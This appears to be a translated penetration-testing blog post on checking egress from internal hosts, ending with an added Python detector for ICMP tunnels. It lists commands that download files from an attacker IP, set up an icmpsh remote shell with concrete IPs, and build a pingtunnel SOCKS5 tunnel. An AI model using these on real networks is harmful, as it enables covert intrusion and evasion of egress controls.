Internal network penetration: egress (outbound connectivity) detection
2024-11-29 14:11:04 # Internal network penetration

Categories

ICMP

DNS

HTTP/HTTPS

Recording port requests on the attacker side

Forward traffic arriving on any port to port 34444:

```bash
iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 34444
```

View the rules in the nat table:

```bash
iptables -t nat -nvL
```

Flush all rules in the nat table:

```bash
iptables -t nat -F
```

Back up the iptables rules:

```bash
iptables-save > /tmp/firewall.rules
```

Restore the iptables rules:

```bash
iptables-restore < /tmp/firewall.rules
```

ICMP check

ping

DNS check

WIN: ping, nslookup

LIN: ping, nslookup, dig

HTTP check

LIN: curl http://IP

WIN: certutil -urlcache -split -f http://IP/1

bitsadmin /transfer test http://IP/1 c:\1

powershell iwr -Uri http://IP/1 -OutFile 1 -UseBasicParsing

On the VPS, starting an HTTP server with Python is enough.

Only ICMP reaches the outside

Command-line control over ICMP (ICMPSH)

Scenario: the target machine runs Windows

```bash
# Tool repository
https://github.com/bdamele/icmpsh.git
```

On the VPS

```bash
# Disable kernel ICMP echo replies; set the value back to 0 to re-enable them
sysctl -w net.ipv4.icmp_echo_ignore_all=1
# If that errors, use this temporary (non-persistent) form instead
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
# Run: the first IP is the VPS IP, the second is the target's IP
python2 icmpsh_m.py 116.205.237.158 202.116.31.94
# Requires the impacket library; install it as prompted
```

On the target

```bash
icmpsh.exe -t VPSIP -d 500 -b 30 -s 128
```

-d delay

-b maximum number of blanks before exiting

-s maximum buffer size in bytes

Building a tunnel with PingTunnel

pingtunnel disguises tcp/udp/socks5 traffic as ICMP traffic and forwards it; it can only be used as a forward proxy.

```bash
https://github.com/esrrhs/pingtunnel.git
```

Server parameters

```
-key      Numeric password, default 0. Integer in the range 0-2147483647; letters and special characters are not allowed.
-nolog    Do not write log files, only print to standard output; default 0 (off).
-noprint  Do not print to the screen; default 0 (off).
-loglevel Log level; default info.
-maxconn  Maximum number of connections; default 0 (unlimited).
-maxprt   Maximum number of processing threads on the server; default 100.
-maxprb   Maximum processing-thread buffer count on the server; default 1000.
-conntt   Timeout for the server to initiate a connection to the destination address; default 1000 ms.
```

Client parameters

```
-l        Local address; traffic sent to this port is forwarded to the server.
-s        Server address; traffic is forwarded to this server through the tunnel.
-t        Destination address the remote server forwards to; traffic ends up at this address.
-timeout  Timeout for locally tracked connections, in seconds; default 60 s.
-key      Password; default 0.
-tcp      Whether to forward TCP; default 0.
-tcp_bs   TCP send/receive buffer size; default 1MB.
-tcp_mw   Maximum TCP window; default 20000.
-tcp_rst  TCP resend timeout; default 400 ms.
-tcp_gz   Compress TCP data when a packet exceeds this size; 0 means no compression; default 0.
-tcp_stat Print TCP connection statistics; default 0 (off).
-nolog    Do not write log files, only print to standard output; default 0 (off).
-noprint  Do not print to the screen; default 0 (off).
-loglevel Log level; default info.
-sock5    Enable SOCKS5 forwarding; default 0 (off).
-profile  Enable performance profiling on the specified port; default 0 (disabled).
-s5filter Forwarding filter in SOCKS5 mode; default forwards everything. Setting CN means addresses in the CN region connect directly and are not forwarded.
-s5ftfile Data file for the SOCKS5 forwarding filter; by default reads GeoLite2-Country.mmdb from the current directory.
```

Forward SOCKS5 proxy

Server

```bash
# Disable kernel ICMP echo replies
sysctl -w net.ipv4.icmp_echo_ignore_all=1
# If that errors, use this temporary (non-persistent) form instead
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
# Listen
./pingtunnel -type server -noprint 1 -nolog 1
```

Client

```bash
pingtunnel.exe -type client -l :1080 -s VPSIP -sock5 1 -noprint 1 -nolog 1
```

Then set the proxy to SOCKS5 127.0.0.1:1080.
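Both icmpsh and pingtunnel above have the same effect on the wire: the echo payloads no longer look like those of a stock ping client, the echo reply no longer mirrors the request's data (the reply itself carries the other direction of the channel), and the request rate is sustained rather than one probe per second. The following is an added example, not code from either project or from the original post, that turns those three observations into detection logic over parsed ICMP packets. The packet records are constructed; the stock-ping payload patterns (Windows' 32-byte alphabet, iputils' timeval plus 0x10..0x37 sequence) are assumptions based on common clients, and the thresholds are tuning knobs.

```python
"""Heuristics for spotting ICMP echo tunnels (icmpsh / pingtunnel style) in
parsed ICMP traffic. Added example; the packet records are constructed."""
from collections import defaultdict

ECHO_REQUEST, ECHO_REPLY = 8, 0
# Stock ping payloads (assumption based on common clients): Windows sends a
# fixed 32-byte alphabet; Linux iputils sends 56 bytes, a struct timeval
# (8 or 16 bytes) followed by the byte sequence up to 0x37.
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvwabcdefghi"

def is_stock_payload(payload):
    """True if the echo data looks like an unmodified ping client produced it."""
    if payload == WINDOWS_PATTERN:
        return True
    return len(payload) == 56 and any(
        payload[k:] == bytes(range(k, 0x38)) for k in (8, 16))

def analyze_icmp(packets, max_req_per_sec=2.0, min_requests=10):
    """packets: dicts with ts (seconds), src, dst, type, id, seq, payload.
    Returns {internal_src: sorted reasons} for hosts whose echo traffic does
    not behave like ping."""
    reasons = defaultdict(set)
    pending = {}                 # (req src, req dst, id, seq) -> request payload
    req_ts = defaultdict(list)   # src -> timestamps of its echo requests
    for p in sorted(packets, key=lambda x: x["ts"]):
        if p["type"] == ECHO_REQUEST:
            pending[(p["src"], p["dst"], p["id"], p["seq"])] = p["payload"]
            req_ts[p["src"]].append(p["ts"])
            if not is_stock_payload(p["payload"]):
                reasons[p["src"]].add("non-stock echo payload")
        elif p["type"] == ECHO_REPLY:
            # The reply travels back from the request's dst to its src.
            sent = pending.pop((p["dst"], p["src"], p["id"], p["seq"]), None)
            if sent is None:
                reasons[p["dst"]].add("echo reply without matching request")
            elif sent != p["payload"]:
                # RFC 792: an echo reply returns the request data unchanged, so a
                # differing payload means the peer uses replies to carry data.
                reasons[p["dst"]].add("reply payload differs from request")
    for src, stamps in req_ts.items():
        span = stamps[-1] - stamps[0]
        if len(stamps) >= min_requests and len(stamps) / max(span, 1e-9) > max_req_per_sec:
            reasons[src].add("echo request rate above threshold")
    return {src: sorted(r) for src, r in reasons.items()}

def _pkt(ts, src, dst, typ, ident, seq, payload):
    return {"ts": ts, "src": src, "dst": dst, "type": typ,
            "id": ident, "seq": seq, "payload": payload}

def build_sample():
    """Constructed capture: one benign Linux ping session and one tunnel-like
    session with 128-byte payloads out and command text back, 0.5 s apart."""
    pkts = []
    for i in range(3):  # benign: 16-byte timeval + 0x10..0x37, replies mirror it
        data = (1700000000 + i).to_bytes(16, "big") + bytes(range(0x10, 0x38))
        pkts.append(_pkt(i, "10.0.5.40", "203.0.113.5", ECHO_REQUEST, 0x1234, i, data))
        pkts.append(_pkt(i + 0.01, "203.0.113.5", "10.0.5.40", ECHO_REPLY, 0x1234, i, data))
    for i in range(12):  # suspicious: data out, different data back
        out = ("line %02d of command output\n" % i).encode().ljust(128, b"\x00")
        back = b"whoami\r\n" if i % 4 == 0 else b""
        pkts.append(_pkt(10 + i * 0.5, "10.0.5.23", "203.0.113.10", ECHO_REQUEST, 1, i, out))
        pkts.append(_pkt(10 + i * 0.5 + 0.02, "203.0.113.10", "10.0.5.23", ECHO_REPLY, 1, i, back))
    return pkts

if __name__ == "__main__":
    for host, why in analyze_icmp(build_sample()).items():
        print(host, "->", ", ".join(why))
```

The payload-mismatch check is the strongest of the three, because it follows from the protocol itself rather than from client defaults; a blocked-ping policy that still permits echo traffic to arbitrary external hosts is what makes these tunnels viable in the first place, so the complementary mitigation is to restrict outbound ICMP to the destinations that actually need it.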